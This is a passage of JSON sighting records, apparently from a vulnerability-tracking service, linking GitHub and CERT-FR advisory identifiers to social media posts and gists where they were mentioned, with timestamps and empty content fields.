"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-016", "type": "seen", "source": "https://bsky.app/profile/macsouverain.bsky.social/post/3mjjlxp4eoe24", "content": "", "creation_timestamp": "2026-04-15T09:38:44.869557Z"}, {"uuid": "c9371bea-59b3-47e2-9704-7e8cca58721b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RHF7-WVW3-VJVM", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mk6phlnjkzl2", "content": "", "creation_timestamp": "2026-04-23T19:07:17.873523Z"}, {"uuid": "c7d37d69-feb5-488a-9ceb-55be31a9bea6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r4q5-vmmm-2653", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mkai47r4zd26", "content": "", "creation_timestamp": "2026-04-24T12:00:56.164783Z"}, {"uuid": "6fb6dbaa-da74-49ab-89f4-1386f6336df5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-007", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116080374524280085", "content": "", "creation_timestamp": "2026-02-16T12:45:54.676107Z"}, {"uuid": "5f663911-c821-47b7-b9ca-ea2239590081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-007", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mey3eubk2s26", "content": "", "creation_timestamp": "2026-02-16T12:45:50.443422Z"}, {"uuid": "c1aad914-48ed-456a-b859-e040b2346bab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-007", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mey45yxzcg2h", "content": "", "creation_timestamp": "2026-02-16T12:59:54.327643Z"}, {"uuid": "7a5ebfd8-991d-4ace-81f3-babb0d6ea36d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5882-5rx9-xgxp", "type": "seen", "source": "https://gist.github.com/alon710/595e6f7853da9ba7834c1f6969ecb4ac", "content": "", "creation_timestamp": "2026-02-16T13:30:19.000000Z"}, {"uuid": "022f3961-a570-4801-b47b-85bc1ec4f092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-005", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mea3qcnkay2g", "content": "", "creation_timestamp": "2026-02-06T23:48:20.879439Z"}, {"uuid": "b228d4e0-3c1f-4721-8edb-6ef40c0631df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r79c-pqj3-577x", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3men5dkcypk2i", "content": "", "creation_timestamp": "2026-02-12T04:21:36.662156Z"}, {"uuid": "7e6e9cb8-8062-4a63-b796-c26cf13065fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-965m-v4cc-6334", "type": "seen", "source": "https://gist.github.com/alon710/fb916d39ccf405108e6b4f5410cee3a7", "content": "", "creation_timestamp": "2026-02-13T13:40:07.000000Z"}, {"uuid": "52c3f80c-f2a6-4438-bd5a-920f5b14cc62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vhvq-fv9f-wh4q", "type": "seen", "source": "https://gist.github.com/alon710/8323d7b3849b55718473864a8e9cc2a6", "content": "", "creation_timestamp": "2026-02-07T02:40:06.000000Z"}, {"uuid": "07b3777b-bcf2-4c7a-9e46-6a3c186a45d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89p3-4642-cr2w", "type": "seen", "source": "https://gist.github.com/alon710/d04c9ed716c8cbccbfced51ccf8ca09b", "content": "", "creation_timestamp": "2026-02-12T20:10:23.000000Z"}, {"uuid": "139ab1ba-d8de-4103-bcc7-0f5d597c091e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-74rh-c5rh-88vg", "type": "seen", "source": "https://gist.github.com/alon710/028a8953192d7efab7c1a7e7fe25fbb0", "content": "", "creation_timestamp": "2026-02-12T20:40:23.000000Z"}, {"uuid": "f0332366-16f9-4713-9b36-97734c529974", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-382Q-FPQH-29F7", "type": "seen", "source": "https://gist.github.com/alon710/b598c4c5e72f81adce75e2bb0f575305", "content": "", "creation_timestamp": "2026-02-07T21:10:05.000000Z"}, {"uuid": "ec34e021-3716-41cf-8dba-fd64502cae1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6662-54XR-8423", "type": "seen", "source": "https://gist.github.com/alon710/2524cd22406db9b4350297f8ee37f5fa", "content": "", "creation_timestamp": "2026-02-07T23:40:05.000000Z"}, {"uuid": "5debb2c0-507d-4de1-8fc4-55e713fbccf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69x3-g4r3-p962", "type": "seen", "source": "https://gist.github.com/alon710/5e14acf3178fd2de685f82c8375fcf6e", "content": "", "creation_timestamp": "2026-02-08T00:10:06.000000Z"}, {"uuid": "aa02d6ad-4714-41df-b244-74ed606cc77d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VX5F-VMR6-32WF", "type": "seen", "source": "https://gist.github.com/alon710/82ecad7d4a28a6bf47ea75b198e40cd1", "content": "", "creation_timestamp": "2026-02-10T17:40:06.000000Z"}, {"uuid": "3b4fcae3-f7b1-4f4b-b5d7-ee7b6b671579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6662-54XR-8423", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mecp4pynqcv2", "content": "", "creation_timestamp": "2026-02-08T00:40:41.788791Z"}, {"uuid": "1a6ce836-014b-4e71-90a6-4e6ae09050b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xx9g-fh25-4q64", "type": "seen", "source": "https://gist.github.com/alon710/e2cbb4e3c7fdeb40d051c3d7c45483a1", "content": "", "creation_timestamp": "2026-02-08T00:40:06.000000Z"}, {"uuid": "818e3f5c-6197-4200-9901-1bd076434b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26gq-grmh-6xm6", "type": "seen", "source": "https://gist.github.com/alon710/9d16288fb5403944d09be7f88afc1b71", "content": "", "creation_timestamp": "2026-02-08T01:10:05.000000Z"}, {"uuid": "768a0049-e61b-41e9-8baf-1ded81bdf9f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4f84-67cv-qrv3", "type": "seen", "source": "https://gist.github.com/alon710/dac87e6025e0ea1ed1cb16d3c60ed7b0", "content": "", "creation_timestamp": "2026-02-08T02:10:05.000000Z"}, {"uuid": "a06e647b-48cb-47ce-b047-917fde7158be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x6cr-mq53-cc76", "type": "seen", "source": "https://gist.github.com/alon710/e8aa15df4f8e3ea4e441cfecadaefb08", "content": "", "creation_timestamp": "2026-02-10T18:10:05.000000Z"}, {"uuid": "bdc47eb5-ec5c-4975-a3b8-4b449933cfec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W67G-2H6V-VJGQ", "type": "seen", "source": "https://gist.github.com/alon710/77fa3cb54e25b561e55732fa7bee4e36", "content": "", "creation_timestamp": "2026-02-08T02:40:05.000000Z"}, {"uuid": "62a25643-8917-44fa-aa99-35c7c1b5e78d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcqx-8qww-7f4v", "type": "seen", "source": "https://gist.github.com/alon710/2e175162fd496deb4ef52562fb4c5b2b", "content": "", "creation_timestamp": "2026-02-11T05:10:05.000000Z"}, {"uuid": "32acd93d-35f2-44cf-bc5d-6aa4918a00a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f5x2-vj4h-vg4c", "type": "seen", "source": "https://gist.github.com/alon710/8313d7afe645c9d035fed8ea6e3f58d8", "content": "", "creation_timestamp": "2026-02-08T03:10:06.000000Z"}, {"uuid": "313719d3-f2c1-4d3c-89a6-704647aa135b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8wc6-vgrq-x6cf", "type": "seen", "source": "https://bsky.app/profile/renovatebot.com/post/3meq7zfb6b22w", "content": "", "creation_timestamp": "2026-02-13T09:47:36.815710Z"}, {"uuid": "869469af-2fd5-496f-963e-16943e311555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8wc6-vgrq-x6cf", "type": "seen", "source": "https://bsky.app/profile/renovatebot.com/post/3meq7zfbg322w", "content": "", "creation_timestamp": "2026-02-13T09:47:37.366569Z"}, {"uuid": "c038fd6a-49ee-45d1-a5b2-168c5791142c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4q92-rfm6-2cqx", "type": "seen", "source": "https://gist.github.com/alon710/1c6b06029608bb23418dcb4699619f4d", "content": "", "creation_timestamp": "2026-02-08T03:40:06.000000Z"}, {"uuid": "099f528a-fcdd-4918-a332-8b6536531b0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mhg7-666j-cqg4", "type": "seen", "source": "https://gist.github.com/alon710/7bbde07266f0ce6a4608d33da3c417d3", "content": "", "creation_timestamp": "2026-02-08T04:40:05.000000Z"}, {"uuid": "eafe03b1-5569-4d62-99ed-f948c93c644a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q455-m56c-85mh", "type": "seen", "source": "https://gist.github.com/alon710/c533b0ed39b2dd99fa8ad47f72c7f847", "content": "", "creation_timestamp": "2026-02-10T19:10:06.000000Z"}, {"uuid": "1e359658-b4ee-457e-b78b-efbc27c1f854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33mh-2634-fwr2", "type": "seen", "source": "https://gist.github.com/alon710/cacea6a42bc4c1130907055ca55331a4", "content": "", "creation_timestamp": "2026-02-09T21:10:05.000000Z"}, {"uuid": "7217b2f4-e580-4195-83a0-d65e3a996d9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7jx7-3846-m7w7", "type": "seen", "source": "https://gist.github.com/alon710/282df0d3c2c9c8c835a6fd15acd2475f", "content": "", "creation_timestamp": "2026-02-09T22:10:05.000000Z"}, {"uuid": "af53cd84-84b3-4e8b-9a43-2d07c7e2dec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fxp3-g6gw-4r4v", "type": "seen", "source": "https://gist.github.com/alon710/0e2af79b6e2e09f5b68854774d91ca42", "content": "", "creation_timestamp": "2026-02-09T22:40:05.000000Z"}, {"uuid": "91f5047d-a25a-4b5a-9299-d69d6f5a4f44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-56F2-HVWG-5743", "type": "seen", "source": "https://gist.github.com/alon710/1715b27573496e0a28fe9d3ac5e85244", "content": "", "creation_timestamp": "2026-02-17T19:10:31.000000Z"}, {"uuid": "988b0672-6900-4b40-82d6-e65e6d969288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qw99-grcx-4pvm", "type": "seen", "source": "https://gist.github.com/alon710/aaf4c6042dd825c15ce2db35098d1953", "content": "", "creation_timestamp": "2026-02-17T21:10:30.000000Z"}, {"uuid": "da72921e-ad09-463a-8b49-6ab1daaaab6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QRQ5-WJGG-RVQW", "type": "seen", "source": "https://gist.github.com/alon710/5931fababa23f0bc307c5d5d7e952c58", "content": "", "creation_timestamp": "2026-02-17T22:10:30.000000Z"}, {"uuid": "350744ca-e2aa-4cea-b228-ef6ce76af811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6QR9-G2XW-CW92", "type": "seen", "source": "https://gist.github.com/alon710/abc7f0686d49a0775a51f0602a0a26e0", "content": "", "creation_timestamp": "2026-02-20T10:40:39.000000Z"}, {"uuid": "1ab74c7e-9028-47b1-aa6d-a513cef771bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-6qr9-g2xw-cw92", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mfbxlf7ota22", "content": "", "creation_timestamp": "2026-02-20T11:04:32.388718Z"}, {"uuid": "ee4fc9c7-e0fc-460e-842f-713b0abc921e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33HQ-FVWR-56PM", "type": "seen", "source": "https://gist.github.com/alon710/730aa02397a258f2f1ed0aa8f4fa4e6d", "content": "", "creation_timestamp": "2026-02-20T11:10:40.000000Z"}, {"uuid": "609f3791-ff0b-4515-b9e7-fa3faad8cff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8QM3-746X-R74R", "type": "seen", "source": "https://gist.github.com/alon710/913d04fda246fea5d28eaa02383d9238", "content": "", "creation_timestamp": "2026-02-20T11:40:40.000000Z"}, {"uuid": "48d8dd01-3c27-4b27-a756-3cf36e36e3e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-83pf-v6qq-pwmr", "type": "seen", "source": "https://gist.github.com/alon710/b5549a72f940f0947fabf807b34d779c", "content": "", "creation_timestamp": "2026-02-20T18:40:40.000000Z"}, {"uuid": "95dd92f2-25f5-497a-aef9-0d7343ca9872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/alon710/cde946261b29582f7ad29a1910c52fe6", "content": "", "creation_timestamp": "2026-02-20T21:10:39.000000Z"}, {"uuid": "811305cc-e42e-4f2f-8938-62c57dca1eef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-38c4-r59v-3vqw", "type": "seen", "source": "https://gist.github.com/adamdjbrett/1af155b4bb15dd7a0f1b3e6323ef48b8", "content": "", "creation_timestamp": "2026-02-20T21:29:26.000000Z"}, {"uuid": "9e40730a-9b2f-4935-b33a-6f4abff325f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mh29-5h37-fv8m", "type": "seen", "source": "https://gist.github.com/adamdjbrett/1af155b4bb15dd7a0f1b3e6323ef48b8", "content": "", "creation_timestamp": "2026-02-20T21:29:26.000000Z"}, {"uuid": "6f52c0de-da5f-4c4d-b265-f661e003fd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ppc-4f35-3m26", "type": "seen", "source": "https://gist.github.com/adamdjbrett/1af155b4bb15dd7a0f1b3e6323ef48b8", "content": "", "creation_timestamp": "2026-02-20T21:29:26.000000Z"}, {"uuid": "14b24357-9baf-4545-989d-c00bd288f220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV8R-9RW9-9697", "type": "seen", "source": "https://gist.github.com/alon710/4cd1875c786b514610f28029ba8d8c98", "content": "", "creation_timestamp": "2026-02-20T21:40:40.000000Z"}, {"uuid": "7d4f2745-46ab-487d-a22a-f1618d8f349d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v7m3-fpcr-h7m2", "type": "seen", "source": "https://gist.github.com/alon710/935450463949afbac9737b4b067b77a3", "content": "", "creation_timestamp": "2026-02-21T07:10:39.000000Z"}, {"uuid": "9e1f92de-0f88-4331-a745-877678e66b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q5fh-2hc8-f6rq", "type": "seen", "source": "https://gist.github.com/alon710/d7954c7332e01cf40fa1ed726cd8c207", "content": "", "creation_timestamp": "2026-02-21T09:40:40.000000Z"}, {"uuid": "59e07b18-5a7a-4ded-bef7-59068d9c1260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cxpw-2g23-2vgw", "type": "seen", "source": "https://gist.github.com/alon710/63b57342d7d50b3729afe629902bba13", "content": "", "creation_timestamp": "2026-02-21T10:10:40.000000Z"}, {"uuid": "cde74c8b-21d8-4593-aa6d-fc2784a3d0a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-49pc-8936-wvfp", "type": "seen", "source": "https://gist.github.com/alon710/3b1f29c1f136603b6c00eebdb5313d9b", "content": "", "creation_timestamp": "2026-02-21T10:40:39.000000Z"}, {"uuid": "72379c19-5424-44ba-8fce-18fcc5fff971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r6h2-5gqq-v5v6", "type": "seen", "source": "https://gist.github.com/alon710/93d3245a84667a23e678383dbcbdb6e3", "content": "", "creation_timestamp": "2026-02-21T11:40:39.000000Z"}, {"uuid": "782f2a2e-81ce-4c53-bc88-4bdddfbc2fa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wh94-p5m6-mr7j", "type": "seen", "source": "https://gist.github.com/alon710/d6f106c34a98367bc78dbb2de8555198", "content": "", "creation_timestamp": "2026-02-21T12:10:40.000000Z"}, {"uuid": "b5a0bb01-13ac-41e1-b7e0-029c115e1723", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qhp6-635j-x7r2", "type": "seen", "source": "https://gist.github.com/alon710/e56b547bb8d66c88c36130e6613a09b3", "content": "", "creation_timestamp": "2026-02-21T12:40:40.000000Z"}, {"uuid": "eece72f4-2800-4158-8ede-9fff6b9e4c65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7qqc-wrcw-2fj9", "type": "seen", "source": "https://bsky.app/profile/dbt3.ch/post/3mfhcd24jng26", "content": "", "creation_timestamp": "2026-02-22T14:00:02.377146Z"}, {"uuid": "e2ab9b88-0a23-42e7-afbb-e212a4bbf015", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7qqc-wrcw-2fj9", "type": "seen", "source": "https://bsky.app/profile/netalexx.bsky.social/post/3mfhfitqzx22t", "content": "", "creation_timestamp": "2026-02-22T14:56:59.273339Z"}, {"uuid": "7d18f9da-ecd3-4a53-9fbf-6266b45c433f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6475-r3vj-m8vf", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mfjm63wicq2w", "content": "", "creation_timestamp": "2026-02-23T12:01:32.784730Z"}, {"uuid": "0c53dff1-00df-46a7-b2c6-5c5590acd568", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-008", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mfjsz6k6gz2k", "content": "", "creation_timestamp": "2026-02-23T14:04:06.935969Z"}, {"uuid": "c2432fb0-78bc-49b2-a3d0-e3f393b8108a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-008", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116120318282447958", "content": "", "creation_timestamp": "2026-02-23T14:04:04.804064Z"}, {"uuid": "fb345f3b-1dc4-4f76-ba66-f73bbcc8bd71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xjhv-v822-pf94", "type": "seen", "source": "https://gist.github.com/alon710/447723fe5251aee242f8395c82fa3afa", "content": "", "creation_timestamp": "2026-02-25T01:40:27.000000Z"}, {"uuid": "0c7c9f5b-eb1d-4f35-9c0c-4615c2659917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x76f-jf84-rqj8", "type": "seen", "source": "https://gist.github.com/alon710/0a4d2120827a83418bc6e8325fbd6767", "content": "", "creation_timestamp": "2026-02-25T02:40:26.000000Z"}, {"uuid": "44d25f56-21ae-42af-84cc-9392715339ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7pc-pc7g-h8jh", "type": "seen", "source": "https://gist.github.com/alon710/ab126639375f6dbaf22c192fff07799b", "content": "", "creation_timestamp": "2026-02-25T03:10:19.000000Z"}, {"uuid": "c1f84b73-c9c2-4550-ad05-a84ee86948a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4xrr-hq4w-6vf4", "type": "seen", "source": "https://gist.github.com/alon710/cc12d45654c7a0339d51fb9dbbc8ed7f", "content": "", "creation_timestamp": "2026-02-25T03:40:19.000000Z"}, {"uuid": "8ca69ce8-b22c-4491-b888-d901b558d720", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m2cq-xjgm-f668", "type": "seen", "source": "https://gist.github.com/alon710/b552dead23033effdfd76ba11d312188", "content": "", "creation_timestamp": "2026-02-25T04:10:19.000000Z"}, {"uuid": "d73765c0-e65c-4b81-95d8-5c033c6b2395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hhfx-5x8j-f5f6", "type": "seen", "source": "https://gist.github.com/alon710/1f5269447a1894adbb81b93906c7462d", "content": "", "creation_timestamp": "2026-02-25T04:40:18.000000Z"}, {"uuid": "c72ec151-de3a-49be-b398-69e117de8cf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4894-xqv6-vrfq", "type": "seen", "source": "https://gist.github.com/alon710/808673d481acba0d7984b4e29291688e", "content": "", "creation_timestamp": "2026-02-25T05:10:18.000000Z"}, {"uuid": "6df9e679-2ec5-4e8e-918b-aa0cc7eefcab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vxg3-v4p6-f3fp", "type": "seen", "source": "https://gist.github.com/alon710/448101c1bc20902d2d5feed8cf461cdf", "content": "", "creation_timestamp": "2026-02-25T05:40:18.000000Z"}, {"uuid": "0c1b09c2-52c7-4c1d-a0da-0a2973724790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8vrh-3pm2-v4v6", "type": "seen", "source": "https://gist.github.com/alon710/e8bd93f4619202bc0c1f669862922839", "content": "", "creation_timestamp": "2026-02-25T16:10:19.000000Z"}, {"uuid": "d83405b1-0056-4e39-9052-9f4160968feb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-49gm-hh7w-wfvf", "type": "seen", "source": "https://gist.github.com/alon710/5a98ccf5e002241a9fed9bd171aac6d2", "content": "", "creation_timestamp": "2026-02-25T16:40:18.000000Z"}, {"uuid": "538d74d6-b2d9-414d-a4a5-4a5dd4370366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2rw7-x74f-jg35", "type": "seen", "source": "https://gist.github.com/alon710/86c41d51c3c0a8fbc25d6a0500b36acd", "content": "", "creation_timestamp": "2026-02-25T17:10:19.000000Z"}, {"uuid": "92955d5e-97d3-4593-9209-46e3e92fdec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f229-3862-4942", "type": "seen", "source": "https://gist.github.com/alon710/08dcac21faab3680bc696fdf3a7877bd", "content": "", "creation_timestamp": 